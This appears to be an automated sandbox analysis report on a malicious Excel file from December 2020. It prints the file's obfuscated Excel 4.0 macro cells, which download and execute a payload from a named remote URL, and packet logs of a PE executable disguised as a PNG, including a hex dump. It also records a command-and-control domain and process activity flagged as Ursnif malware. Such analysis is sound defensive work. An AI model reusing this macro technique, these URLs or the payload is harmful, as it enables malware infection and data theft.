                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""rnel3""",,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""teDirect""",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(Files2!CN87,Files2!CN96&Files2!CN97,Files2!CI96&Files2!CJ96,0,A40,Files2!CM97,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,=EXEC(Files2!CL101&Files2!CM96&Files2!CM97&Files2!CL100),,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://companieshouseonlinedownload.com/ox9.png,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 23, 2020 14:48:46.861298084 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.904802084 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.904930115 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.905663967 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.964911938 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.964950085 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.964977980 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965006113 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965025902 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965032101 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965060949 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965061903 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965068102 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965089083 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965094090 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965116024 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965126038 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965143919 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965150118 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965173960 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:46.965190887 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965207100 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.965239048 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:46.971618891 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008445024 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008474112 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008511066 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008539915 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008568048 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008572102 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008594990 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008603096 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008610964 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008619070 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008621931 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008649111 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008662939 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008676052 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008682013 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008703947 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008712053 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008732080 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008759975 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008760929 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008776903 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008786917 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008801937 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008815050 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008831024 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008842945 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008853912 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008871078 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008897066 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008898973 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008923054 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.008925915 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008951902 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008979082 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.008982897 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.009006023 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.009032965 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.009885073 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052267075 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052294016 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052333117 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052367926 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052396059 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052423954 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052450895 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052468061 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052479029 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052484989 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052495956 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052500010 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052505970 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052516937 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052534103 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052544117 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052562952 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052588940 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052592039 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052614927 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052623034 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052642107 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052650928 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052669048 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052685976 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052697897 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052716970 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052726984 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052751064 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052757025 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052779913 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052788019 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052808046 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052819014 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052840948 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052850008 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.052874088 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.052880049 CET804916747.254.169.221192.168.2.22

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 23, 2020 14:48:46.480801105 CET5219753192.168.2.228.8.8.8
                        Dec 23, 2020 14:48:46.849703074 CET53521978.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:08.523283958 CET5309953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:08.581275940 CET53530998.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:09.530358076 CET5283853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:10.534378052 CET5283853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:11.548245907 CET5283853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:11.606201887 CET53528388.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.286729097 CET6120053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.288408041 CET4954853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.335350037 CET53612008.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.344763041 CET53495488.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.348845959 CET5562753192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.370590925 CET5600953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.396727085 CET53556278.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.418514967 CET53560098.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.945821047 CET6186553192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.993933916 CET53618658.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.007906914 CET5517153192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.035908937 CET5249653192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.058830976 CET53551718.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.059700966 CET5756453192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.060652971 CET6300953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.062037945 CET5931953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.063117027 CET5307053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.063638926 CET5977053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.064218998 CET6152353192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.093909979 CET53524968.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.108515978 CET53630098.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.110019922 CET6279153192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.110872984 CET53530708.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.111362934 CET53597708.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.112637997 CET53593198.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.115793943 CET53575648.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.129065990 CET53615238.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.157793999 CET53627918.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:14.441529036 CET5066753192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:14.492243052 CET53506678.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:17.297760010 CET5412953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:17.354085922 CET53541298.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.851003885 CET6532953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.851068974 CET6071853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.851372957 CET4915753192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.851943016 CET5739153192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.852509022 CET6185853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.853055954 CET6250053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.898948908 CET53653298.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.898987055 CET53607188.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.899008989 CET53491578.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.899565935 CET53573918.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.900171041 CET53618588.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.900824070 CET53625008.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Dec 23, 2020 14:48:46.480801105 CET192.168.2.228.8.8.80xed69Standard query (0)companieshouseonlinedownload.comA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:09.530358076 CET192.168.2.228.8.8.80x8c47Standard query (0)hospader.xyzA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:10.534378052 CET192.168.2.228.8.8.80x8c47Standard query (0)hospader.xyzA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:11.548245907 CET192.168.2.228.8.8.80x8c47Standard query (0)hospader.xyzA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:17.297760010 CET192.168.2.228.8.8.80xdfe8Standard query (0)hospader.xyzA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Dec 23, 2020 14:48:46.849703074 CET8.8.8.8192.168.2.220xed69No error (0)companieshouseonlinedownload.com47.254.169.221A (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:11.606201887 CET8.8.8.8192.168.2.220x8c47No error (0)hospader.xyz45.142.212.128A (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:17.354085922 CET8.8.8.8192.168.2.220xdfe8No error (0)hospader.xyz45.142.212.128A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • companieshouseonlinedownload.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.224916747.254.169.22180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Dec 23, 2020 14:48:46.905663967 CET0OUTGET /ox9.png HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: companieshouseonlinedownload.com
                        Connection: Keep-Alive
                        Dec 23, 2020 14:48:46.964911938 CET2INHTTP/1.1 200 OK
                        Date: Wed, 23 Dec 2020 13:48:46 GMT
                        Server: Apache/2.4.25 (Debian)
                        Last-Modified: Tue, 22 Dec 2020 12:15:21 GMT
                        ETag: "3a400-5b70c874cc840"
                        Accept-Ranges: bytes
                        Content-Length: 238592
                        Connection: close
                        Content-Type: image/png
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 0c c7 45 f8 4e 00 00 00 c7 45 0c fd 00 00 00 8d 45 0c 89 45 fc 8b 4d 0c 83 c1 01 8b 45 f8 99 f7 f9 89 45 f4 c7 45 10 c1 00 00 00 8b 45 10 83 c8 01 8b 4d 0c 83 c1 01 99
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$D%%%:%n9%:%]X%%%%]O%]Y%w_%]Z%Rich%PELYL[! Kdd`HX.text$ `.rdata[@@.data@.rsrc`@@.relocX@BUENEEEMEEEEM


                        HTTPS Packets

                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                        Dec 23, 2020 14:51:11.803244114 CET45.142.212.128443192.168.2.2249168CN=hospader.xyz CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 10 14:52:46 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 10 14:52:46 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                        Dec 23, 2020 14:51:11.829549074 CET45.142.212.128443192.168.2.2249169CN=hospader.xyz CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 10 14:52:46 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 10 14:52:46 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                        Dec 23, 2020 14:51:18.012993097 CET45.142.212.128443192.168.2.2249176CN=hospader.xyz CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 10 14:52:46 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 10 14:52:46 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:14:48:39
                        Start date:23/12/2020
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase:0x13f3c0000
                        File size:27641504 bytes
                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:14:48:43
                        Start date:23/12/2020
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\cnvmb.rty,DllRegisterServer
                        Imagebase:0xff350000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:14:48:43
                        Start date:23/12/2020
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32 ..\cnvmb.rty,DllRegisterServer
                        Imagebase:0x2c0000
                        File size:44544 bytes
                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:moderate

                        General

                        Start time:14:51:04
                        Start date:23/12/2020
                        Path:C:\Program Files\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                        Imagebase:0x13f880000
                        File size:814288 bytes
                        MD5 hash:4EB098135821348270F27157F7A84E65
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:14:51:04
                        Start date:23/12/2020
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2
                        Imagebase:0x12a0000
                        File size:815304 bytes
                        MD5 hash:8A590F790A98F3D77399BE457E01386A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:14:51:12
                        Start date:23/12/2020
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2
                        Imagebase:0x12a0000
                        File size:815304 bytes
                        MD5 hash:8A590F790A98F3D77399BE457E01386A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Disassembly

                        Code Analysis

                        Reset < >